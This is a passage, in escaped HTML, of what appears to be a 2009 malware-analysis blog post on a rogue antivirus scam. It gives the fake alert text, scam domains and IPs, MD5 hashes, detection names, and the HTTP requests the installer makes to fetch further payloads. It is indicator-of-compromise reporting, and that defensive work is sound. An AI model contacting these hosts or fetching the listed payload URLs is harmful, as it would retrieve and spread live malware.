  &lt;img style="cursor:pointer; cursor:hand;width: 275px; height: 70px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pG6_nOeI/AAAAAAAAAO4/75zeDWyd-Og/s320/FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318303777607334370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake messages&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHf_0xtI/AAAAAAAAAPI/3eiS4A2E_es/s1600-h/FakeAlertMessage.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHf_0xtI/AAAAAAAAAPI/3eiS4A2E_es/s320/FakeAlertMessage.jpg" border="0" alt="Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5318303787540334290" /&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScjYTrin40I/AAAAAAAAAMA/VQ_XfvbZ9U4/s1600-h/Rogue.Antivirus2010-best-click-scanner.info.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="343" border="1" style="border:solid 1px #CCC" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;  &lt;td width="339" height="117"&gt;&lt;i&gt;Alert! Your PC is at risk of virus and spyware attack.&lt;br /&gt;&lt;br /&gt;Your system requires immediate check!i&lt;br /&gt;System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Associated website [174.142.113.206] [ip-174-142-113-206.static.privatedns.com]&lt;br /&gt;&lt;br /&gt;scanner.av-best.info&lt;br /&gt;download.av-best.info&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td width="25" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="547"&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;  &lt;td colspan="2"&gt;hxxp://scanner.av-best.info/scan.php?campaign=mmb_35930207&lt;br /&gt;43&amp;amp;landid=4&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://download.av-best.info/install.php?campaign=mmb_3593020743&lt;br /&gt;&amp;amp;country=en&amp;amp;counter=0&amp;amp;campaign=mmb_3593020743&amp;amp;landid=4&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="91"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;AntiVirusInstaller.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;53278 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;f8d38325d9570ce3320f04e9d5278466&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=f8d38325d9570ce3320f04e9d5278466" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/e9c24e37e26fe8398b529bb0197da58f" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=18c7c73a79abe53c4711294e8983e17ea" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_fecha"&gt;03.28.2009 19:18:31 (CET)&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;8/39 (20.52%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;TR/Crypt.CFI.Gen&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;AntiVir&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Win32.Packed.Krap.c.4&lt;/span&gt;&lt;/td&gt;&lt;td&gt;CAT-QuickHeal&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.DownLoad.33135&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;DrWeb&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt; eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Crypt.CFI.Gen&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee-GW-Edition&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan:Win32/FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Panda&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Cryp_FakeAV-11&lt;/span&gt;&lt;/td&gt;&lt;td&gt;TrendMicro&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;When running:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;tr&gt;&lt;td height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;HTTP Requests&lt;/b&gt;:&lt;/td&gt;&lt;td width="385"&gt;[70.38.11.165]&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;http://70.38.11.165/admin/cgi-bin/get_domain.php?type=site&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Content html: av-best.info&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Content html: download.av-best.info&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;[174.142.113.206]&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;hxxp://download.av-best.info/en/PE/2.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;hxxp://download.av-best.info/en/PE/3.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;hxxp://download.av-best.info/en/PE/en/PE/N1.CAB &lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;hxxp://download.av-best.info/en/PE/en/PE/QWProtect.dll &lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;hxxp://download.av-best.info/en/PE/en/PE/svchost.exe &lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="101"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;2.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;53248 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;364f5d30dba520937f9f3b7979b389b1&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/a3298bbca2c92a71a94a9714b153f4b2" target="_blank"&gt;Report&lt;/a&gt; Alias: &lt;span style="color:#FF0000"&gt;Trojan.Win32/FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:08:07 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;8/39 (20.52%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=364f5d30dba520937f9f3b7979b389b1" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Prevx:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=CB5463450060BCFED030001B300C2100A3EA542B" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;3.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;257536 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;b7d14c7ea7844057efcfd1a41ddc530f&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/57ee185b5803e7d14ce31d5dc390957a" target="_blank"&gt;Report&lt;/a&gt; Alias: &lt;span style="color:#FF0000"&gt;Trojan.Win32/FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:08:18 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;6/39 (15.39%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=b7d14c7ea7844057efcfd1a41ddc530f" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;span id="status_nombre"&gt;AntiVirusInstaller.exe&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;53278 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;f8d38325d9570ce3320f04e9d5278466&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/a3298bbca2c92a71a94a9714b153f4b2" target="_blank"&gt;Report&lt;/a&gt; Alias: &lt;span style="color:#FF0000"&gt;Trojan.Win32/FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:08:19 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;8/38 (21.06%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=f8d38325d9570ce3320f04e9d5278466" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;span id="status_nombre2"&gt;N1.CAB&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;504489 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;c37aa0887be14b68381301e24ddaf8fb&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/c669c1d718e5c0bc093de2b0ac056668" target="_blank"&gt;Report&lt;/a&gt; Alias: &lt;span style="color:#FF0000"&gt;Trojan.Win32/FakeXPA&lt;/span&gt; / &lt;span style="color:#FF0000"&gt;Trojan.Win32.Tibs&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Received on 03.28.2009 22:08:51 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;5/38 